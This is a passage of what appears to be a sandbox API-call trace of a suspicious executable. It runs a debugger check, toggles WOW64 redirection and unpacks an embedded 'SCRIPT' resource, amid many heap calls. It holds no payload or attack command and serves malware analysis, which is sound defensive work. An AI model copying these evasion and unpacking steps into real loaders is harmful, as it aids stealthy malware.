hHeap=0x1780000) returned 1 [0070.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d3b0 | out: hHeap=0x1780000) returned 1 [0070.033] CloseHandle (hObject=0x234) returned 1 [0070.033] IUnknown:Release (This=0x179b1c8) returned 0x0 [0070.033] FreeLibrary (hLibModule=0x290000) returned 1 [0070.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178c330 | out: hHeap=0x1780000) returned 1 [0070.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d430 | out: hHeap=0x1780000) returned 1 [0070.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178a680 | out: hHeap=0x1780000) returned 1 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x178ddd8 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1288 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b100 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d430 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179afe8 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1390 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d380 [0070.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1390 | out: hHeap=0x1780000) returned 1 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b1f0 [0070.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1480 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1528 [0070.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179b100 | out: hHeap=0x1780000) returned 1 [0070.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d430 | out: hHeap=0x1780000) returned 1 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13c0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3d0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a14e0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d480 [0070.034] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b100 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12a0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d430 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12b8 [0070.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13c0 | out: hHeap=0x1780000) returned 1 [0070.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d3d0 | out: hHeap=0x1780000) returned 1 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12d0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3b0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3c0 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x17a1660 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d440 [0070.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1408 [0070.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a12d0 | out: hHeap=0x1780000) returned 1 [0070.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d3b0 | out: hHeap=0x1780000) returned 1 [0070.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1288 | out: hHeap=0x1780000) returned 1 [0070.035] IsDebuggerPresent () returned 0 [0070.035] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x142fa48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x0) returned 0x28 [0070.035] GetLongPathNameW (in: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpszLongPath=0x142fa48, cchBuffer=0x7fff | out: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe") returned 0x28 [0070.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1348 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3b0 [0070.036] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x142fa18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x0) returned 0x28 [0070.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1348 | out: hHeap=0x1780000) returned 1 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x17879e0 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b150 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1318 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b2b8 [0070.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3d0 [0070.036] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0070.036] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0070.036] Wow64DisableWow64FsRedirection (in: OldValue=0x143f9b4 | out: OldValue=0x143f9b4*=0x0) returned 1 [0070.036] FreeLibrary (hLibModule=0x772d0000) returned 1 [0070.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x143f850, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0070.037] GetFileType (hFile=0x234) returned 0x1 [0070.037] LoadLibraryExW (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0070.037] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0070.037] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x772e6b50 [0070.037] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0070.037] FreeLibrary (hLibModule=0x772d0000) returned 1 [0070.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x17a1880 [0070.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d450 [0070.037] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x143f9e4 | out: ppstm=0x143f9e4*=0x179b010) returned 0x0 [0070.037] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358440 [0070.038] LoadResource (hModule=0x290000, hResInfo=0x358440) returned 0x360410 [0070.038] SizeofResource (hModule=0x290000, hResInfo=0x358440) returned 0x4bb58 [0070.038] LockResource (hResData=0x360410) returned 0x360410 [0070.038] ISequentialStream:RemoteWrite (in: This=0x179b010, pv=0x360410*=0xa3, cb=0x4bb58, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0070.038] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.038] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x17a1880, cb=0x18, pcbRead=0x143f93c | out: pv=0x17a1880*=0xa3, pcbRead=0x143f93c*=0x18) returned 0x0 [0070.038] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f980, cb=0x4, pcbRead=0x143f93c | out: pv=0x143f980*=0x45, pcbRead=0x143f93c*=0x4) returned 0x0 [0070.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d450 | out: hHeap=0x1780000) returned 1 [0070.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1880 | out: hHeap=0x1780000) returned 1 [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f9a4, cb=0x10, pcbRead=0x143f97c | out: pv=0x143f9a4*=0x4d, pcbRead=0x143f97c*=0x10) returned 0x0 [0070.038] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143f878 | out: lpSystemTimeAsFileTime=0x143f878*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.038] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.038] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f2f8, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f2f8*=0x6b, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.038] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f300, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f300*=0xa6, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f0e8, cb=0x34, pcbRead=0x143f0bc | out: pv=0x143f0e8*=0xe1, pcbRead=0x143f0bc*=0x34) returned 0x0 [0070.038] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.038] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f300, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f300*=0x1e, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f32c, cb=0x7c, pcbRead=0x143f0bc | out: pv=0x143f32c*=0xff, pcbRead=0x143f0bc*=0x7c) returned 0x0 [0070.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.039] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f2f0, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f2f0*=0xbc, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.039] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f2f8, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f2f8*=0x6b, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f300, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f300*=0xaf, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f0e8, cb=0x26, pcbRead=0x143f0bc | out: pv=0x143f0e8*=0xe6, pcbRead=0x143f0bc*=0x26) returned 0x0 [0070.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f300, cb=0x4, pcbRead=0x143f0bc | out: pv=0x143f300*=0x62, pcbRead=0x143f0bc*=0x4) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f32c, cb=0x84, pcbRead=0x143f0bc | out: pv=0x143f32c*=0x6c, pcbRead=0x143f0bc*=0x84) returned 0x0 [0070.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143efb8 | out: lpSystemTimeAsFileTime=0x143efb8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f9b3, cb=0x1, pcbRead=0x143f304 | out: pv=0x143f9b3*=0x1, pcbRead=0x143f304*=0x1) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f9ac, cb=0x4, pcbRead=0x143f304 | out: pv=0x143f9ac*=0xc0, pcbRead=0x143f304*=0x4) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f9ac, cb=0x4, pcbRead=0x143f304 | out: pv=0x143f9ac*=0xc3, pcbRead=0x143f304*=0x4) returned 0x0 [0070.039] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x143f9ac, cb=0x4, pcbRead=0x143f304 | out: pv=0x143f9ac*=0x9e, pcbRead=0x143f304*=0x4) returned 0x0 [0070.039] IStream:RemoteSeek (in: This=0x179b010, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x193c7f) returned 0x3e0e020 [0070.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4b97c) returned 0x17fd3f0 [0070.050] ISequentialStream:RemoteRead (in: This=0x179b010, pv=0x17fd3f0, cb=0x4b97c, pcbRead=0x143f304 | out: pv=0x17fd3f0*=0x6d, pcbRead=0x143f304*=0x4b97c) returned 0x0 [0070.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x143f200 | out: lpSystemTimeAsFileTime=0x143f200*(dwLowDateTime=0xf5e3769d, dwHighDateTime=0x1d69b3e)) [0070.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20000) returned 0x1848d78 [0070.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x17a1880 [0070.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x1868d80 [0070.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1848d78 | out: hHeap=0x1780000) returned 1 [0070.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1880 | out: hHeap=0x1780000) returned 1 [0070.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1868d80 | out: hHeap=0x1780000) returned 1 [0070.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fd3f0 | out: hHeap=0x1780000) returned 1 [0070.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x47c74) returned 0x17fd3f0 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796dc8 [0070.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796dc8 | out: hHeap=0x1780000) returned 1 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b178 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a14c8 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b1a0 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1468 [0070.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a14c8 | out: hHeap=0x1780000) returned 1 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1348 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13f0 [0070.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d450 [0070.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d450 | out: hHeap=0x1780000) returned 1 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1348 | out: hHeap=0x1780000) returned 1 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1378 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1438 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13c0 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d450 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13c0 | out: hHeap=0x1780000) returned 1 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d450 | out: hHeap=0x1780000) returned 1 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1438 | out: hHeap=0x1780000) returned 1 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1498 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1e) returned 0x179b308 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13c0 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b088 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d450 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179b308 | out: hHeap=0x1780000) returned 1 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1558 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12d0 [0070.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13c0 | out: hHeap=0x1780000) returned 1 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1510 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1390 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1540 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b240 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a14b0 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1348 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1330 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1288 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1438 [0070.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1450 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a14c8 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a12d0 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1558 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1510 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1390 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1300 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1498 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d470 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d470 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1498 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13f0 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a14f8 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d470 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a14f8 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d470 | out: hHeap=0x1780000) returned 1 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1378 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a) returned 0x179b1c8 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12d0 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b218 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d470 [0070.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179b1c8 | out: hHeap=0x1780000) returned 1 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1510 [0070.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12e8 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a12d0 | out: hHeap=0x1780000) returned 1 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1420 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1300 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1540 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b1c8 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a14f8 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1360 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1558 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12d0 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1390 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13a8 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13c0 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a12e8 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1510 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1420 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1510 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1300 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18450a0 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18450a0 | out: hHeap=0x1780000) returned 1 [0070.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1510 | out: hHeap=0x1780000) returned 1 [0070.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1300 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1510 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1378 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452b0 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452b0 | out: hHeap=0x1780000) returned 1 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1510 | out: hHeap=0x1780000) returned 1 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13f0 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1c) returned 0x179b268 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a12e8 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b308 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845310 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179b268 | out: hHeap=0x1780000) returned 1 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1540 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 